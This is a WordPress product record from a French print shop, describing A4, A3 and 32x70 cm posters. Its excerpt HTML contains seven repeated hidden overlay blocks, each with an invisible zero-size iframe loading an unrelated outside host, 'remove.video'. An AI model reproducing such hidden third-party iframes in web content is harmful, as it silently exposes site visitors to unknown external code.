{"id":2019,"date":"2021-04-18T11:51:25","date_gmt":"2021-04-18T09:51:25","guid":{"rendered":"https:\/\/imprimerie-copylux.fr\/?post_type=product&#038;p=2019"},"modified":"2021-04-18T12:19:10","modified_gmt":"2021-04-18T10:19:10","slug":"affiches-a4-a3-32x70","status":"publish","type":"product","link":"https:\/\/imprimerie-copylux.fr\/index.php\/product\/affiches-a4-a3-32x70\/","title":{"rendered":"AFFICHES A4, A3, 32&#215;70&#8230;"},"content":{"rendered":"","protected":false},"excerpt":{"rendered":"<p><b>L&rsquo;affiche A3 est aujourd&rsquo;hui le format le plus command\u00e9 et le plus r\u00e9pandu.<\/b> C&rsquo;est un excellent compromis entre visibilit\u00e9 et co\u00fbt : 2 fois plus grande que le format A4, l&rsquo;impression sur format A3 offre suffisamment d&rsquo;espace pour communiquer un message simple, sans pour autant co\u00fbter trop cher. En effet, de dimensions 42 x 29,7 cm, l&rsquo;affiche A3 fait partie de la gamme des affichettes r\u00e9guli\u00e8rement utilis\u00e9es par les commer\u00e7ants pour promouvoir leurs actions commerciales. Elle est aussi tr\u00e8s appr\u00e9ci\u00e9e des associations afin d&rsquo;annoncer des \u00e9v\u00e9nements comme des soir\u00e9es caritatives, des concerts, des matchs ou des sorties sportives&#8230; et s&rsquo;adaptera aussi bien pour une orientation horizontale que verticale.<\/p>\n<p>Nous vous proposons aussi un format original<b> en 32 x 70 cm<\/b> , un format longiligne original et esth\u00e9tique&#8230;<\/p>\n<div class=\"et_pb_module et_pb_wc_description et_pb_wc_description_0 et_pb_bg_layout_light et_pb_text_align_left\">\n<div class=\"et_pb_module_inner\">\n<ul class=\"product-infos-technique\">\n<li>Format : 21 x 29,7 cm &#8211; 29,7 x 42 cm ou max. 32 x 70 cm<\/li>\n<li>Papier : 150 gr couch\u00e9 demi-mat<\/li>\n<li>Impression : quadrichromie (couleur) en recto<\/li>\n<li>A partir de 1 ex<\/li>\n<li>D\u00e9lai de livraison : J+1 possible<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n","protected":false},"featured_media":2021,"template":"","meta":[],"product_brand":[],"product_cat":[60],"product_tag":[],"class_list":{"0":"post-2019","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-imprimerie","8":"first","9":"instock","10":"featured","11":"shipping-taxable","12":"product-type-external"},"_links":{"self":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product\/2019","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media\/2021"}],"wp:attachment":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media?parent=2019"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_brand?post=2019"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_cat?post=2019"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_tag?post=2019"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}